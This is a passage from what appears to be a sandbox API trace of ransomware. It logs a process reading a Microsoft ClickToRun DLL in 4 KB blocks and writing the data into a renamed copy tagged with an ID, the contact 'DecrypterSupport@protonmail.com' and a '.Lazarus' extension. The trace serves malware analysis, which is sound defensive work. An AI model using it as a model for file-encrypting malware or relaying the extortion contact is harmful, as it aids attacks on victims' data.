Flags=0x0, Size=0xb2) returned 0x55f20 [0094.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0094.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0094.233] AreFileApisANSI () returned 1 [0094.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 136 [0094.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8b680 [0094.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x8b680, cchWideChar=136 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 136 [0094.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0094.234] GetFileType (hFile=0x33c) returned 0x1 [0094.234] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0094.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0094.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0094.234] AreFileApisANSI () returned 1 [0094.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0094.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x851c0 [0094.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d370, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0094.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.235] GetFileType (hFile=0x418) returned 0x1 [0094.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0094.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0094.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0094.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0094.235] GetLastError () returned 0x0 [0094.235] SetLastError (dwErrCode=0x0) [0094.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0094.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.235] GetLastError () returned 0x0 [0094.235] SetLastError (dwErrCode=0x0) [0094.235] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0094.235] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0094.235] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0094.238] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0094.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0094.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0094.239] GetLastError () returned 0x0 [0094.239] SetLastError (dwErrCode=0x0) [0094.239] GetLastError () returned 0x0 [0094.239] SetLastError (dwErrCode=0x0) [0094.239] GetLastError () returned 0x0 [0094.239] SetLastError (dwErrCode=0x0) [0094.240] GetLastError () returned 0x0 [0094.240] SetLastError (dwErrCode=0x0) [0094.240] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.240] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.241] GetLastError () returned 0x0 [0094.241] SetLastError (dwErrCode=0x0) [0094.242] GetLastError () returned 0x0 [0094.242] SetLastError (dwErrCode=0x0) [0094.242] GetLastError () returned 0x0 [0094.242] SetLastError (dwErrCode=0x0) [0094.242] GetLastError () returned 0x0 [0094.242] SetLastError (dwErrCode=0x0) [0094.242] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.242] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.242] GetLastError () returned 0x0 [0094.242] SetLastError (dwErrCode=0x0) [0094.242] GetLastError () returned 0x0 [0094.243] SetLastError (dwErrCode=0x0) [0094.243] GetLastError () returned 0x0 [0094.243] SetLastError (dwErrCode=0x0) [0094.243] GetLastError () returned 0x0 [0094.243] SetLastError (dwErrCode=0x0) [0094.243] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.243] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.243] GetLastError () returned 0x0 [0094.243] SetLastError (dwErrCode=0x0) [0094.243] GetLastError () returned 0x0 [0094.244] SetLastError (dwErrCode=0x0) [0094.244] GetLastError () returned 0x0 [0094.244] SetLastError (dwErrCode=0x0) [0094.244] GetLastError () returned 0x0 [0094.244] SetLastError (dwErrCode=0x0) [0094.244] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.244] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.244] GetLastError () returned 0x0 [0094.244] SetLastError (dwErrCode=0x0) [0094.244] GetLastError () returned 0x0 [0094.244] SetLastError (dwErrCode=0x0) [0094.245] GetLastError () returned 0x0 [0094.245] SetLastError (dwErrCode=0x0) [0094.245] GetLastError () returned 0x0 [0094.245] SetLastError (dwErrCode=0x0) [0094.245] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.245] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.245] GetLastError () returned 0x0 [0094.245] SetLastError (dwErrCode=0x0) [0094.245] GetLastError () returned 0x0 [0094.245] SetLastError (dwErrCode=0x0) [0094.245] GetLastError () returned 0x0 [0094.245] SetLastError (dwErrCode=0x0) [0094.246] GetLastError () returned 0x0 [0094.246] SetLastError (dwErrCode=0x0) [0094.246] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.246] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.246] GetLastError () returned 0x0 [0094.246] SetLastError (dwErrCode=0x0) [0094.246] GetLastError () returned 0x0 [0094.246] SetLastError (dwErrCode=0x0) [0094.246] GetLastError () returned 0x0 [0094.246] SetLastError (dwErrCode=0x0) [0094.246] GetLastError () returned 0x0 [0094.246] SetLastError (dwErrCode=0x0) [0094.247] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.247] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.247] GetLastError () returned 0x0 [0094.247] SetLastError (dwErrCode=0x0) [0094.247] GetLastError () returned 0x0 [0094.247] SetLastError (dwErrCode=0x0) [0094.247] GetLastError () returned 0x0 [0094.247] SetLastError (dwErrCode=0x0) [0094.247] GetLastError () returned 0x0 [0094.247] SetLastError (dwErrCode=0x0) [0094.247] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.248] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.248] GetLastError () returned 0x0 [0094.248] SetLastError (dwErrCode=0x0) [0094.248] GetLastError () returned 0x0 [0094.248] SetLastError (dwErrCode=0x0) [0094.248] GetLastError () returned 0x0 [0094.248] SetLastError (dwErrCode=0x0) [0094.248] GetLastError () returned 0x0 [0094.248] SetLastError (dwErrCode=0x0) [0094.248] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.248] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.249] GetLastError () returned 0x0 [0094.249] SetLastError (dwErrCode=0x0) [0094.249] GetLastError () returned 0x0 [0094.249] SetLastError (dwErrCode=0x0) [0094.249] GetLastError () returned 0x0 [0094.249] SetLastError (dwErrCode=0x0) [0094.249] GetLastError () returned 0x0 [0094.249] SetLastError (dwErrCode=0x0) [0094.249] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.249] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.250] GetLastError () returned 0x0 [0094.250] SetLastError (dwErrCode=0x0) [0094.250] GetLastError () returned 0x0 [0094.250] SetLastError (dwErrCode=0x0) [0094.250] GetLastError () returned 0x0 [0094.250] SetLastError (dwErrCode=0x0) [0094.250] GetLastError () returned 0x0 [0094.250] SetLastError (dwErrCode=0x0) [0094.250] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.250] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.250] GetLastError () returned 0x0 [0094.250] SetLastError (dwErrCode=0x0) [0094.250] GetLastError () returned 0x0 [0094.251] SetLastError (dwErrCode=0x0) [0094.251] GetLastError () returned 0x0 [0094.251] SetLastError (dwErrCode=0x0) [0094.251] GetLastError () returned 0x0 [0094.251] SetLastError (dwErrCode=0x0) [0094.251] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.251] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.251] GetLastError () returned 0x0 [0094.251] SetLastError (dwErrCode=0x0) [0094.251] GetLastError () returned 0x0 [0094.251] SetLastError (dwErrCode=0x0) [0094.251] GetLastError () returned 0x0 [0094.251] SetLastError (dwErrCode=0x0) [0094.252] GetLastError () returned 0x0 [0094.252] SetLastError (dwErrCode=0x0) [0094.252] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.252] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.252] GetLastError () returned 0x0 [0094.252] SetLastError (dwErrCode=0x0) [0094.252] GetLastError () returned 0x0 [0094.252] SetLastError (dwErrCode=0x0) [0094.252] GetLastError () returned 0x0 [0094.252] SetLastError (dwErrCode=0x0) [0094.252] GetLastError () returned 0x0 [0094.252] SetLastError (dwErrCode=0x0) [0094.253] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.253] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.254] GetLastError () returned 0x0 [0094.254] SetLastError (dwErrCode=0x0) [0094.255] GetLastError () returned 0x0 [0094.255] SetLastError (dwErrCode=0x0) [0094.255] GetLastError () returned 0x0 [0094.255] SetLastError (dwErrCode=0x0) [0094.255] GetLastError () returned 0x0 [0094.255] SetLastError (dwErrCode=0x0) [0094.255] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.255] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.255] GetLastError () returned 0x0 [0094.255] SetLastError (dwErrCode=0x0) [0094.255] GetLastError () returned 0x0 [0094.255] SetLastError (dwErrCode=0x0) [0094.255] GetLastError () returned 0x0 [0094.256] SetLastError (dwErrCode=0x0) [0094.256] GetLastError () returned 0x0 [0094.256] SetLastError (dwErrCode=0x0) [0094.256] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.256] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.256] GetLastError () returned 0x0 [0094.256] SetLastError (dwErrCode=0x0) [0094.256] GetLastError () returned 0x0 [0094.256] SetLastError (dwErrCode=0x0) [0094.256] GetLastError () returned 0x0 [0094.256] SetLastError (dwErrCode=0x0) [0094.256] GetLastError () returned 0x0 [0094.257] SetLastError (dwErrCode=0x0) [0094.257] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.257] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.257] GetLastError () returned 0x0 [0094.257] SetLastError (dwErrCode=0x0) [0094.257] GetLastError () returned 0x0 [0094.257] SetLastError (dwErrCode=0x0) [0094.257] GetLastError () returned 0x0 [0094.257] SetLastError (dwErrCode=0x0) [0094.257] GetLastError () returned 0x0 [0094.257] SetLastError (dwErrCode=0x0) [0094.257] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.258] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.258] GetLastError () returned 0x0 [0094.258] SetLastError (dwErrCode=0x0) [0094.258] GetLastError () returned 0x0 [0094.258] SetLastError (dwErrCode=0x0) [0094.258] GetLastError () returned 0x0 [0094.258] SetLastError (dwErrCode=0x0) [0094.258] GetLastError () returned 0x0 [0094.258] SetLastError (dwErrCode=0x0) [0094.258] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.258] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.259] GetLastError () returned 0x0 [0094.259] SetLastError (dwErrCode=0x0) [0094.259] GetLastError () returned 0x0 [0094.259] SetLastError (dwErrCode=0x0) [0094.259] GetLastError () returned 0x0 [0094.259] SetLastError (dwErrCode=0x0) [0094.259] GetLastError () returned 0x0 [0094.513] SetLastError (dwErrCode=0x0) [0094.524] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.524] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.525] GetLastError () returned 0x0 [0094.525] SetLastError (dwErrCode=0x0) [0094.525] GetLastError () returned 0x0 [0094.526] SetLastError (dwErrCode=0x0) [0094.526] GetLastError () returned 0x0 [0094.526] SetLastError (dwErrCode=0x0) [0094.526] GetLastError () returned 0x0 [0094.526] SetLastError (dwErrCode=0x0) [0094.530] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.530] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.530] GetLastError () returned 0x0 [0094.530] SetLastError (dwErrCode=0x0) [0094.530] GetLastError () returned 0x0 [0094.531] SetLastError (dwErrCode=0x0) [0094.531] GetLastError () returned 0x0 [0094.531] SetLastError (dwErrCode=0x0) [0094.531] GetLastError () returned 0x0 [0094.531] SetLastError (dwErrCode=0x0) [0094.531] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.531] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.531] GetLastError () returned 0x0 [0094.531] SetLastError (dwErrCode=0x0) [0094.531] GetLastError () returned 0x0 [0094.531] SetLastError (dwErrCode=0x0) [0094.531] GetLastError () returned 0x0 [0094.532] SetLastError (dwErrCode=0x0) [0094.532] GetLastError () returned 0x0 [0094.532] SetLastError (dwErrCode=0x0) [0094.532] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.532] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.532] GetLastError () returned 0x0 [0094.532] SetLastError (dwErrCode=0x0) [0094.532] GetLastError () returned 0x0 [0094.532] SetLastError (dwErrCode=0x0) [0094.532] GetLastError () returned 0x0 [0094.532] SetLastError (dwErrCode=0x0) [0094.532] GetLastError () returned 0x0 [0094.533] SetLastError (dwErrCode=0x0) [0094.533] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.533] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.533] GetLastError () returned 0x0 [0094.533] SetLastError (dwErrCode=0x0) [0094.533] GetLastError () returned 0x0 [0094.533] SetLastError (dwErrCode=0x0) [0094.533] GetLastError () returned 0x0 [0094.533] SetLastError (dwErrCode=0x0) [0094.533] GetLastError () returned 0x0 [0094.533] SetLastError (dwErrCode=0x0) [0094.533] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.533] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.534] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] GetLastError () returned 0x0 [0094.534] SetLastError (dwErrCode=0x0) [0094.534] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.535] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) 